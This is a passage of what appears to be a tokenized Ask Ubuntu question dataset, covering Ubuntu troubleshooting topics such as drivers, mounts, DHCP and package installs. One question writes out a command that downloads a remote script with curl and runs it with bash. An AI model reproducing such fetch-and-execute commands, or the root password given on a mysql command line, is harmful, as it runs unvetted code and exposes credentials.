( correct ? ) . if this is a continuously running server and is always turned on in our server room , then should n't the logged in user be my 'webuser ' i just created in order to limit access to individuals trying to hack in ?
31397	can i rate an application in software center without writing a review for it ?	can i just rate an application in the ubuntu software center without having to write a complete review ? i only get a window with sso and a review text and rating .
31399	how do i install capistrano ?	i 'm struggling here with no success in order to install capistrano on my ubuntu dev machine . here is the list of commands issued : 1 ) sudo apt-get update 2 ) sudo apt-get install build-essential git-core curl 3 ) bash < < ( curl http : //rvm.beginrescueend.com/releases/rvm-install-head ) 4 ) echo ' [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & source `` $ home/.rvm/scripts/rvm '' ' > > ~/.bashrc 5 ) ( close and reopen terminal window ) 6 ) rvm notes ( looked for : `` for ruby ( mri & ree ) you should install the following os dependencies : '' and did : 7 ) sudo aptitude install build-essential bison openssl libreadline6 libreadline6-dev curl git-core zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt-dev autoconf libc6-dev ncurses-dev now we can install ruby by doing : 8 ) rvm install 1.9.2 then we tell rvm to use it : 9 ) rvm 1.9.2 and to do it always : 10 ) rvm -- default use 1.9.2 with ruby properly instaled we can now : 11 ) gem install capistrano and then : 12 ) gem install railsless-deploy despite all those steps being successful steps , when i do : cap -t i 'm unable to see the deploy tasks listed as expected . i only getting : cap invoke cap shell listed . why ?
31405	will 11.04 support gnome shell ?	i was just wondering if the gnome shell ( not gnome 3 and gtk3 ) will be in the ubuntu repos in 11.04 . i know it is in the repositories for 10.10 , but it quite outdated . i like unity and gnome shell , and have spent time using both , but i just went back to 10.10 from 11.04 as unity and compiz keep crashing on alpha 3 . i was just wondering if the shell would be in the 11.04 repositories for release ?
31411	force resize of java window	i 'm trying to resize a dialog window from a java application ( thinkorswim ) . oddly , the main application window does n't suffer from the same issue and can be minimized/maximized without a problem . currently , the settings dialogs for thinkorswim are ridiculously big . output from xwininfo shows that the window is 895x13037 . there is no minimize/maximize buttons in the title bar . i 'm on 10.10 using gnome with metacity + compiz . dual monitors off an nvidia 9800gt . things i 've tried : setting window size rules in compiz for the window type specified when you `` grab '' the window . force resizing using wmctrl ( i.e. $ wmctrl -i -r 0x04a0373c -e 0,0,0,895,895 ) alt+click and moving to the bottom of the window to resize for lowe-right corner , but there is no resize cursor . any other possibilities ? i thought the swing toolkit just used the system 's look and feel to size windows , so i 'm stumped . should i just contact the developer ?
31412	how do i remotely access my ubuntu virtual machine ?	i have an ubuntu desktop edition virtual machine and i would like to access it via ssh remotely but if i 'm not logged onto the virtual machine i can not access it remotely via ssh . only when i 'm logged onto the virtual machine 's ubuntu , can i access it remotely . is there a way around this ? is this the ubuntu vm 's configuration , or the virtual box 's , or ... ? thank you so much !
31414	ca n't login after fsck on live cd	this morning , i started up to find all sorts of disk errors going on on boot , so i started up the live cd and fsck 'd my linux partition . this fixed a whole lot of stuff , so i then rebooted . all 's well and the boot goes fine , except instead of my automatic login to desktop , i 'm at the default login screen . i can see my normal username , except my password now does n't work ( showing in a split second authentication failed or something similar then returning to the user list ) . clicking automatic login on the menu just flashes nothing and returns to the user list . trying to login through tty does n't work either . does anyone know how i could fix this and login as my normal user again ?
31416	how do i completely format my disk ?	i want to format because my laptop has stopped connecting to my wireless connection and hopefully this will fix it .
31420	how do i fix bug # 534190 ( where python interactive help runs a module speech dispatcher )	i am trying to teach myself python . when i run the interactive help from the python console in gedit and ask it to list all modules it runs the configuration for the speech dispatcher . i googled and found the above bug report on launchpad , it seems to contain two different methods of patching the problem , but i am unsure how to use either of them , being a relative linux noob . i was hoping someone could point me in the right direction . thanks for your time !
31423	how do i fix my wireless network connection ? it stopped searching for wireless connections	i am running ubuntu 10.10 it used to be able to connect and find wireless connections , but now it has stopped completely and does n't display my home wifi network . how do i fix this ? thank you in advance .
31424	does hibernate work with an encrypted home dir in maverick ?	my machine no longer resumes properly after hibernation . however , it used to until recently . when trying to figure this out , i 've seen lots of people say that hibernate does n't work with encrypted home directories . but that ca n't be right - i 've had en encrypted directory since it was default , and my machine used to resume . and does n't everyone have an encrypted directory by default now - surely hibernate would never work then !
31427	how do i put a web application on the launcher ?	sometimes i see pictures of screenshots with people with web applications and nice icons on their launcher , how can i set this up ?
31430	how to run mysql commands through shell script ?	mysql -u root -pmysql ; select table_name as `` table name '' , table_rows as `` quant of rows '' , round ( ( data_length + index_length ) /1024/1024,2 ) as `` total size mb '' from information_schema.tables where information_schema.tables.table_schema='database_name ' ; i want to create a shell script which will execute these command and return the result . how may i run this commands through shell script ?
31433	kernel panic - not syncing : attempted to kill init !	i 'm trying to perform the load command on a clean machine- the process sterted and stuck on this line : kernel panic- not syncing : attempted to kill init ! what can be the reason ?
31435	how to install librsvg2 ?	how do you install libsrvg2 with the apt-get install command ? i 've tried the following : root @ ubuserver : ~ # apt-get install librsvg2-bin reading package lists ... done building dependency tree reading state information ... done e : could n't find package librsvg2-bin how would you install it ?
31436	how can i change the function of the caps lock key within the colemak keyboard layout ?	so one of the things that really made text editing with vim easier for me is switching the caps lock and escape keys , which it turns out i can do in the gui keyboard settings . but now when i 'm using the colemak keyboard layout , the caps lock key is mapped to a backspace , whereas i want it mapped to either caps lock or escape . is there an easy way to change this ?
31440	how can i merge the different keyboard indicators ?	presently i use two application indicators showing a keyboard : input methods ( ibus ) keyboard layout is there a way to make them merge into one single indicator icon ? what i have in mind is the equivalent of the messaging menu ( gathering all that is related to communications ) or the sound menu ( gathering all the controls for sound ) . if it is too complicated to merge the indicators , is the merge planned for an upcoming ubuntu release ? i am on ubuntu 11.10 with unity as my environment .
31441	dhcp server allow only known mac and have special configuration to one of them ?	i wanted to configure a dhcp server for my network but i need 1 special configure on it . my current network is like this : my server is currently at 10.0.0.2 and the dhcp server at eth0 my personal computer is at 10.0.0.1 my other computers goes from 10.0.0.3 to 10.0.0.20 my guest computers goes from 10.0.0.21 to 10.0.0.30 i have 2 internet connections : 1 internet is connected to 10.0.0.2 on eth1 2 internet is connected to my personal computer at 10.0.0.1 the special configuration is that my personal machine wo n't get any dns server or gateway so it will still use the internet connected to it while still being possible to access my local network . currently to acomplish this i have to manually setup my ip and netmask leaving the dns blank . here is how my dhcpd.conf is at the momment : # dhcpd.conf # ddns-update-style none ; default-lease-time 600 ; max-lease-time 7200 ; authoritative ; deny duplicates ; log-facility local7 ; subnet 10.0.0.0 netmask 255.255.255.0 { option broadcast-address 10.0.0.255 ; option subnet-mask 255.255.255.0 ; pool { range 10.0.0.1 10.0.0.1 ; deny unknown-clients ; } pool { option routers 10.0.0.2 ; option domain-name-servers 10.0.0.2 ; range 10.0.0.3 10.0.0.200 ; deny unknown-clients ; } } host m1 { hardware ethernet some-mac ; fixed-address 10.0.0.1 ; } host datacomp { hardware ethernet other-mac ; fixed-address 10.0.0.3 ; } # more comps ... . subnet 10.0.111.0 netmask 255.255.255.0 { } currently what happens is that it will always give me the gateway and dns on my personal computer which is not what i want . the above configuration seems to work fine as to not letting any non-registered mac to gain an ip . are there any ways to fix up my personal computer dhcp or will i have to always configure it by hand like i do currently ? anyone , wrong place ?
31442	os-prober returns nothing	what does it mean if os-prober returns nothing . i understood that this should find all my installed operating systems . but i 'm running from ubuntu so i expected it to at least find that . but i get no output at all . sudo fdisk -l gives disk /dev/sda : 40.0 gb , 40020664320 bytes 255 heads , 63 sectors/track , 4865 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00067959 device boot start end blocks id system /dev/sda1 * 1 4680 37590016 83 linux /dev/sda2 4680 4866 1489921 5 extended /dev/sda5 4680 4866 1489920 82 linux swap / solaris
31447	why does apache start automatically ?	i 've some issues with my webservers apache and lighttpd on ubuntu 9.04 . i use lighttpd only and i 've stopped apache on ubuntu , but for some reason since few days ago , apache starts to run and i need to stop it in order to restart lighttpd . what could be the reason ? cron has nothing about this . and this issue started to exist just last week . how can i disable apache ? thanks
31450	tool for recovering deleted data from a flash drive	what is the best tool for recovering deleted data from a flash drive ( pen drive ) ?
31459	how to change openvpn server address ?	currently my openvpn server has ip address 10.8.0.1 . i want to change it to 10.9.0.1 . i tried changing the following lines in server.conf # configure server mode and supply a vpn subnet # for openvpn to draw client addresses from . # the server will take 10.8.0.1 for itself , # the rest will be made available to clients . # each client will be able to reach the server # on 10.8.0.1 . comment this line out if you are # ethernet bridging . see the man page for more info . server 10.9.0.0 255.255.255.0 but when i restart openvpn it is still getting the address 10.8.0.1 . is this the right way to do it ?
31462	how do i update to the most recent version of kmymoney ?	i 'm a relative newbie to ubuntu ( 10.04 ) . i 'm converting from windows to ubuntu , and the last piece of the puzzle is installing a substitute for microsoft money ; e.g . kmymoney . i have installed kmymoney 1.0.4 using kde 3.5.10 from the repositories but there is a more recent version available from the kmymoney website ( 4.5.3 for platform kde4 ) . from spm , it looks like i have installed kde libs 4c2a ( which i assume is kde4 ) i 've tried `` software sources/other sources '' and added a ppa site but it did n't work . what is the correct specific procedure for downloading this other software ? and on a related question , what is the difference between the kde desktop and the standard gnome desktop , and , if i install kde4 , how do i select one or the other at boot ? can i run kmymoney in gnome ( do i need kde ) ? thanks
31465	attenuate applications while receiving output from mumble	this relates to mumble . the attenuate other applications feature does not work ( lowers volume of other applications while someone is talking ) . i was wondering if there was native feature built into ubuntu which can take over this duty . suggestions much appreciated .
31468	who is calling gvfsd and when ?	i want to know who is calling the gvfsd process and when ? from where it is running ? if we want to run it manually ... thanks
31471	how to create lan of virtual machine ?	i have 2 virtual machines in the same physical machine [ using libvirt/kvm ] . how can i create a lan with these 2 machines ? host and the guests are running ubuntu .
31473	microphone output gets sent to speakers	i have a strange problem with headphones - when i plug them in i can hear in them , apart from normal sounds like music , everything microphone collects . and by everything i mean everything ... . i hear every tap on the touchpad ... i hear how hdd works . it is pretty anoying . my laptop is samsung r580 , i 'm using 10.10 with 2.6.36-28 kernel . if u need any more info just ask . thx for any help ! p.s . this may be connected with another unresolved problem i have : squeak after lid close p.p.s . sometimes without without headphones when i tap the microphone i hear the `` tap '' in the speakers
31474	replace ip address within a string	i 'd like to change the ip address in this string with some user input : rmi.sceduling.service.url=rmi\ : //192.168.0.19\:1199/scedulingservice the code should also work if there is no address : rmi.sceduling.service.url= it should also be portable , at least to solaris . the code i am using at the moment : value=`grep 'rmi ' application.properties \ | awk -f '' : '' ' { print $ 2 } ' \ | awk -f '' \ ' '' ' { print $ 1 } ' | cut -d '/ ' -f 3-5 ` sed -e `` s/ $ value/ $ host_ip/g '' application.properties > file.tmp \ & & mv file.tmp application.properties
31476	keep synced folders/data online if unsynced	hiya , i just unsynced one of my folders but had hoped the data would remain in the cloud until deleted - which is , quite obviuosly , not the case . so right now i 'm trying to sync the whole folder again but i 'm curious if there is a way of keeping the data online although i deactivate the sync option on my netbook / ubuntu 10.10 . i tried to find information on this in the faq but could n't ... i 'm thankful for any help ! : )
31477	use a newer zte modem with usb-modeswitch	recently , i bought a 3g hsdpa modem from cell c ( south africa ) . it is a zte mf190 capable of 7.2mbps up and 5.76mbps down . so anyway i noticed usb_modeswitch does not support it . the details are as follows : before switching : 19d2:1224 after switching : 19d2:0082 so the question is how to switch this modem ? which i will provide as an answer .
31483	why my ubuntu 10.10 cd player can not read cd files copies from winxp	before installing ubuntu 10.10 i made four verbatim dvd cd copies of all my files in windowsxp.laptop fujitsu simens amilo . after installation of ubuntu 10.10 the cd player managed to read and show only one dvd with music folder.other three with mixed pictures and documents it does not recognize and show nothing.open with gave no results . what tools must i have in my new ubuntu 10.10 to enable cd player to see and read my files from ex windowsxp ?
31485	which wireless 3g cards work ?	i 'm running ubuntu maverick on a thinkpad x201 . does anyone know what 3g wireless cards or usb dongles work ?
31488	how to test if my video card has 3d support ?	how can i test if my video card has 3d support ? someone told to use fgl_glxgears , but it does not exist here , not even for installation with apt-get .
31494	can i move the launcher to the right side ? left side is too distracting to me	i am ready to stop using unity because i find having the launcher on the left side too distracting . i use windows 7 taskbar on the right side of the screen and really like this . but i ca n't stand having os controls on my left margin . how do i move the launcher to the right side ? i 'm not going to be able to keep using unity if the launcher has to be on the left side .
31495	how do i auto-connect to a dsl-usb-modem ?	i have modem called tp-link td-8817 usb the problem who when i log to ubuntu the modem do n't run but if i want to run it i should remove the wire of the modem and enter it again i have to do this every-time i want to run the internet .
31498	how do i uninstall minefield , now that official firefox 4.0 is out ?	updated from minefield to official release via ppa : mozillateam/firefox-stable . minefield is still installed on my system . how do i get rid of this while retaining the official 4.0 release/ppa ?
31500	can/should i unmount dellutility ?	i 'm using a dell with windows and i am also using ubuntu as a 2nd os by wubi . when i boot into ubuntu i have two hard drive icons one labeled dellutility and the other labled as recovery on my desktop . these really annoy me . i can unmount them but i 'm worried that this will cuase a problem to my computer or even mess up windows when i boot into it . what can i do or should i do ?
31501	where is bashrc profile for root ?	i believe the question says it all . also if it does n't exist where do i create it . ubuntu 10.04
31529	how do i fix my graphics settings - messed up opengl i think !	bit of an annoying one - i was trying to fix the jaggy edges on my wobbly windows a little while back and i ended up somehow completely disabling all of my pretty stuff . i believe i was trying to replace an opengl driver with another using command line and now somehow i have no driver at all : ( when i run briquolo it runs at about 2fps . just did that as a test so it seems i can run opengl stuff , just extremely poorly , which suggests my graphics card is pretty much redundant in my machine . is there a program or package i can run to check/reinstall it ? thanks a lot for any contributions .
31530	where are the battery graphs ?	once upon a time , when i went to the battery icon on my netbook , i could get it to show me interesting graphs of the battery state , and how it had changed over time . nowadays , in this time of decay , all it will give me is a tooltip telling me how long i 've got left , or how long to recharge . does anyone else remember the golden age of which i speak , or have any advice on how it might be regained ?
31531	will i be able to remove unity and zeitgeist completely ?	if i will ever use ubuntu 11.04 , it will be essential for me to remove both unity and zeitgeist completely from it . can i remove both completely without running into problems with the rest of the os ? i am using automatic login and i am not willing to change this to manually start the os in classic mode manually .
31534	configuration management , tripwire style ?	is there a method to detect configuration/package changes on a server that is more ubuntu-centric than tripwire ? i 'd like a tripwire-like daemon that would report configuration diff 's and package addition/removal to a central database , so reconstructing a similar server could be done from scratch . sort of like client-side puppet but automatic and without having to install ruby , and like tripwire , but more high-level than just file changes .
31562	i installed a font that i do n't like , and now i ca n't find it . how do i either find and delete this font of reset my fonts to the default ones	i installed a font called caribbean island for some web development , but decided that i did n't like it . i later found out that chromium was replacing the fonts on some webpages ( such as all gawker sites ) , and it looks very ugly . how do i get rid of this thing ? things i 've tried , but did n't come up with anything relevant : searching the entire system for anything with the words 'caribbean ' or 'island' opened synaptic and did a search for 'ttf-' sudo apt-get remove ttf-caribbean-island with every other combination of dashes and syntax you can think of . best case scenario : a way to completely reset all of the fonts . any help here ?
31570	is there an asus webstorage client ?	is there 'asus webstorage client ' for ubuntu 10.04 ? i do n't want to use wine . i have an asus and when i bought it i was given one year free 500 gb backup . it works in windows but can i make it work in ubuntu ? from here . `` âťif you are using non-eee pc preloaded linux or other operating systems : we are porting asus webstorage software to support all major operating systems . we will send you an email to notify the release . please stay tuned . ''
31572	skype does n't find my audio input	skype does n't find my audio input . if i click on the `` microphone '' no other suggestions appears , my web camera works . in windows everything works . this is my audio preferences . audio settings .
31576	how to run a web browser as a screensaver	i would like to set up a custom application ( a separate profile of firefox browser in my case ) to be fired instead of screensaver . i am using gnome desktop environment . technically it does n't have to be a screensaver ( xscreensaver , gnome-screensaver ) . what i want is for the application to be run whenever no keyboard/mouse input has been received for n minutes and to disappear ( or minimize ) after pressing a key . is it possible ? edit : originally i 've asked about firefox only , but i would be fully satisfied with any other reasonable browser ( like chrome ? ) .
31578	how to set up two gnome sessions to start automatically	is it possible to set up two different gnome sessions to be started at boot time ? as it is now ( and by default in any ubuntu installation ) a gdm login screen is presented after a few minutes of booting . after i log in , it 's possible to use the `` switch user '' functionality and have a second gnome session running ( for another reason ) . then , both sessions are accessible by pressing ctrl + alt + f7 and ctrl + alt + f8 . moreover it would be great if both sessions used different settings ( different users ) for automatic logging in .
31580	is there a way of leveling/compressing the sound system-wide ?	as a laptop user , i 'm sure that a lot of people , even the ones using netbooks would have already gone through this problem . especially when listening to podcasts , and using it as an example , the sound might have loud moments and quiet moments , one person speaking loud and the other speaking very quiet in the same episode . thereby , i always wanted the sound to be compressed system-wide , and i just noted the other day , that in windows , some realtek drivers already offer this function . we have already a pulseaudio plugin for equalization system-wide , and although it still has problems like not letting us change its values and listen the change in real time , or cracking the sound while changing pulse volume , i do love it and use it . now i 'm just missing something to keep the sound around 0db ( or near the volume level you 're using ) as a leveler plugin for pulseaudio . any suggestion ?
31582	send messages between 2 ubuntu pcs ( net send style )	i am trying to find a way to send a message ( like a popup message ) from 1 pc to another . both are using ubuntu . already tried the smbclient way but this only works between a linux pc to a windows pc . i need a way to send messages from an ubuntu pc to another ubuntu pc . similar to the way of windows net send .
31584	how do i copy one file to many subfolders ?	it sounds like a simple question but if it was i would n't be asking it . i can obviously do this by opening all the folders in nautilus and pasting each one individually but the computer is the robot not me ( i 'm talking about 500 files ) . so is there a way of doing this more efficently by gui or command line ? either is as good as the other . if it makes you feel better you will be saving a poor `` v '' key from severe punishment .
31588	ubuntu generated new mysql configs	i deleted /etc/mysql , everything in it . i tried : apt-get -- purge remove mysql-server then : apt-get install mysql-server they will not return , how do i get them to ? there seems to be some very specific config the files need to use upstarts service mysql start including some debian-sys-maint ( or something ) config settings ... wish it was a simple as making a /etc/mysql/my.cnf but its not .
31594	folder tagging ?	is there any program that can tag folders ? i have different files within a folder and there are to many folders , if i could tag each folder ( contrary to tag each file ) then it would be very easy for me to categorise these folders . does anyone knows if such thing can be done ? thank you .
31595	clean-up duplications etc . in virtual memory ( ram )	my laptops virtual memory ( ram ) is very low . i run ubuntu 10.4 . i uninstalled many software programs but still it does not seem to help . i have not installed the regular updates in a couple of months now because of low space . is there a way of doing a clean-up on file duplications , unnecessary temp files , and unused files that will ease up some space . i never experienced low memory issues when i was running windows and the painful vista . i ca n't see that it should be a problem now .
31596	i am having trouble 'syncing ' my files	first , i love ubuntu ... thank you ... you folks are brilliant ! the problem i 'm having is when i 'right-click ' to sync my files the only option i am given is 'hide ribbon ' ... i just want to sync my files , but i am not given the option ? t/y for any assistance .
31597	intel i965 and compiz in 11.04 64-bit	i would like to know if my intel i965 card can use compiz effects . i heard it was blacklisted and needed a fix by xorg . is the fix available in 64-bit 11.04 ? i 'm a new windows migrant , so take it easy on me . update i know it is going to be released in april , so i 'm digging around for hardware compatibility issues . does that mean when the 11.04 when it is released , i can use compiz ? also i tried 10.10 netbook live usb and appearance window showed that 'mutter is n't working ' . finally , i plan to buy a modem , can it work out of box or will i need to tweak something , if so how ?
31601	changing file type icons with assogiate	i am ubuntu 10.10 ( 64 bits ) user and i would like know how to make nautilus display a customized svg icon for all my latex files . searching for this information , i discovered that the program assogiate is capable of to replace the default icon assigned to the latex files by a customized svg icon . for the other hand it seems that there is a bug related to assogiate and nautilus . 1-could you point me any workaround to solve the problem between assogiate and nautilus ? 2-is there another program that could be use to this end ? thanks . ps : after change the latex file icons using assogiate it is possible to see the new icon in thunar .
31605	how to secure grub recovery mode	when i boot system in to recovery mode from grub menu , i can get in to all powerful root without entering any password , thus insecure . how i can secure this and ensure that a password is asked every time i attempt to access root in recovery mode ?
31606	can ubuntu one mobile stream flac files or other audio types or just mp3 ?	i was reading the tech specs at https : //one.ubuntu.com/mobile/ and the title says it all . thank you
31608	why 's the firefox button gray ?	should n't the orange color be the default for the firefox button on linux as well ? ubuntu even has orange colored buttons in the default theme , but why 's the firefox button gray ?
31609	i uninstalled unity and now i do n't have any desktop environment	i was testing unity , but did n't like it . when i got rid of it there was nothing there , just a big white screen . when i tried to apt-get gnome it gave me this error : the following packages have unmet dependencies : gnome : depends : swfdec-mozilla but it is not going to be installed e : broken packages
31614	how to delete/edit files from readonly filesystem	i am having problem with my memory device ( actually a memory card that act external memory device like pendrive ) . experimentx @ workmatex : /var/www/zendtest $ sudo rm /media/a88f-8788/python-2.7.1-docs-html.zip rm : can not remove `/media/a88f-8788/python-2.7.1-docs-html.zip ' : read-only file system i tried to change the file permission of the system but that does n't work experimentx @ workmatex : /var/www/zendtest $ sudo chmod 0777 /media/a88f-8788/python-2.7.1-docs-html.zip chmod : changing permissions of `/media/a88f-8788/python-2.7.1-docs-html.zip ' : read-only file system but it perfectly works on windows . update on opening the drive and running command sudo mount -o remount , rw /media/a88f-8788 /var/log/syslog : mar 23 15:29:48 workmatex kernel : [ 18042.257407 ] fat_get_cluster : 11 callbacks suppressed mar 23 15:29:48 workmatex kernel : [ 18042.257414 ] fat : filesystem error ( dev sdb1 ) mar 23 15:29:48 workmatex kernel : [ 18042.257418 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:29:48 workmatex kernel : [ 18042.257425 ] fat : filesystem has been set read-only mar 23 15:29:48 workmatex kernel : [ 18042.258187 ] fat : filesystem error ( dev sdb1 ) mar 23 15:29:48 workmatex kernel : [ 18042.258194 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:35 workmatex kernel : [ 18149.333787 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:35 workmatex kernel : [ 18149.333795 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:35 workmatex kernel : [ 18149.335949 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:35 workmatex kernel : [ 18149.335957 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:35 workmatex kernel : [ 18149.354903 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:35 workmatex kernel : [ 18149.354911 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:35 workmatex kernel : [ 18149.357213 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:35 workmatex kernel : [ 18149.357221 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:35 workmatex kernel : [ 18149.359547 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:35 workmatex kernel : [ 18149.359555 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:35 workmatex kernel : [ 18149.361929 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:35 workmatex kernel : [ 18149.361936 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:35 workmatex kernel : [ 18149.377416 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:35 workmatex kernel : [ 18149.377424 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:35 workmatex kernel : [ 18149.379384 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:35 workmatex kernel : [ 18149.379392 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:35 workmatex kernel : [ 18149.381898 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:35 workmatex kernel : [ 18149.381906 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:35 workmatex kernel : [ 18149.383764 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:35 workmatex kernel : [ 18149.383772 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:40 workmatex kernel : [ 18154.569747 ] fat_get_cluster : 11 callbacks suppressed mar 23 15:31:40 workmatex kernel : [ 18154.569754 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:40 workmatex kernel : [ 18154.569758 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:40 workmatex kernel : [ 18154.569765 ] fat : filesystem has been set read-only mar 23 15:31:40 workmatex kernel : [ 18154.572022 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:40 workmatex kernel : [ 18154.572029 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:40 workmatex kernel : [ 18154.582933 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:40 workmatex kernel : [ 18154.582941 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:40 workmatex kernel : [ 18154.585921 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:40 workmatex kernel : [ 18154.585929 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:40 workmatex kernel : [ 18154.587819 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:40 workmatex kernel : [ 18154.587827 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:40 workmatex kernel : [ 18154.597547 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:40 workmatex kernel : [ 18154.597555 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:40 workmatex kernel : [ 18154.599503 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:40 workmatex kernel : [ 18154.599511 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:40 workmatex kernel : [ 18154.602896 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:40 workmatex kernel : [ 18154.602905 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:40 workmatex kernel : [ 18154.615338 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:40 workmatex kernel : [ 18154.615346 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) mar 23 15:31:40 workmatex kernel : [ 18154.618574 ] fat : filesystem error ( dev sdb1 ) mar 23 15:31:40 workmatex kernel : [ 18154.618581 ] fat_get_cluster : invalid cluster chain ( i_pos 0 ) var/log/message : mar 23 15:29:48 workmatex kernel : [ 18042.257407 ] fat_get_cluster : 11 callbacks suppressed mar 23 15:31:40 workmatex kernel : [ 18154.569747 ] fat_get_cluster : 11 callbacks suppressed
31618	how can i find my hardware details ?	is there any built-in software or terminal method allowing me to view the hardware profiles on my system ? windows equivalent of such a feature would be device manager .
31622	debconf window appearing after installing burg	i have just added the ppa 'ppa : bean123ch/burg ' with a view to installing burg , a graphical boot manager . in the software center , after having clicked on 'install ' for burg-pc , i have a pop-up window titled 'debconf on my computer name ' , asking me to configure burg . it has to entry areas . one , which is blank , label as `` linux command line '' and another , which already has `` quiet splash '' in it , is labeled as linux default command line . what should i do ? should i choose the default , as suggested on this thread on the ubuntu forums ?
31623	issues to inspect a long text file	if i run sudo pico /var/log/lighttpd/website/error.log i get a very long file , and i can not see last lines . if i run : sudo tail -f /var/log/lighttpd/website/error.log | awk ' { print $ 1 `` -- '' $ 2 } ' i do n't get anything ? what am i doing wrong ? also , how can i move to a specific line using pico editor ? thanks
31626	how to connect via aftp ?	hi , i want to get files from apple machine on my ubuntu ( installed in virtual box ) is there any process to do that ? normally , i want to do : afp : //myapplecomputer if i try to open with file browser ( on location ) , it says nautilus can not handle `` afp '' locations
31629	what kind of text formatting is valid on launchpad ?	what kind of and to what extent is formatting possible on launchpad posts such as questions and bug reports ?
31632	oracle installation script execution privileges : `` oracle is not in the sudoers file ''	i 'm currently installing oracle 11g on ubuntu 10.10 it had been asked to execute some scripts as `` root '' while installation . i 'm doing : oracle @ sergio : /u01/app/orainventory $ sudo sh orainstroot.sh and got : [ sudo ] password for oracle : oracle is not in the sudoers file . this incident will be reported . how could i actually run these scripts if i logged under oracle user with `` root '' privileges ? thank you for help .
31634	auto-mounts ntfs drives in read-only mode	i installed pysdm through this article to auto-mount my ntfs partitions . my drive structure looks like this : jatin @ jatin-ubuntu : /media $ df -h filesystem size used avail use % mounted on /dev/sda8 18g 12g 5.5g 68 % / none 1.5g 344k 1.5g 1 % /dev none 1.5g 216k 1.5g 1 % /dev/shm none 1.5g 92k 1.5g 1 % /var/run none 1.5g 0 1.5g 0 % /var/lock none 1.5g 0 1.5g 0 % /lib/init/rw /dev/sda2 50g 50g 277m 100 % /media/jatin /dev/sda3 49g 46g 2.9g 95 % /media/study /dev/sda5 88g 83g 5.4g 94 % /media/fun /dev/sda7 32g 32g 177m 100 % /media/masti /home/jatin/.private 18g 12g 5.5g 68 % /home/jatin /dev/sda1 59g 57g 2.4g 96 % /media/windows7 my pysdm settings as mentioned in the above article are as follows : the assistant options for the ntfs drives are as follows : the file system is mounted at boot time . mount file-system in only read-only mode . i have two files : /etc/fstab and /etc/fstab.bak with their contents as follows : fstab # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda8 / ext4 errors=remount-ro 0 1 /dev/sda6 none swap sw 0 0 /dev/sda2 /media/jatin ntfs nls=iso8859-1 , ro , umask=000 0 0 /dev/sda3 /media/study ntfs nls=iso8859-1 , umask=000 0 0 /dev/sda5 /media/fun ntfs nls=iso8859-1 , ro , umask=000 0 0 /dev/sda7 /media/masti ntfs nls=iso8859-1 , ro , umask=000 0 0 /dev/sdc1 /media/sdc1 ntfs nls=iso8859-1 , ro , noauto , umask=000 0 0 and fstab.bak # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda8 / ext4 errors=remount-ro 0 1 /dev/sda6 none swap sw 0 0 /dev/sda2 /media/jatin ntfs nls=iso8859-1 , ro , umask=000 0 0 /dev/sda3 /media/study ntfs nls=iso8859-1 , umask=000 0 0 /dev/sda5 /media/fun ntfs nls=iso8859-1 , ro , umask=000 0 0 /dev/sda7 /media/masti ntfs nls=iso8859-1 , ro , umask=000 0 0 /dev/sdc1 /media/sdc1 ntfs nls=iso8859-1 , ro , noauto , umask=000 0 0 initially , i had mistakenly created silver spoon 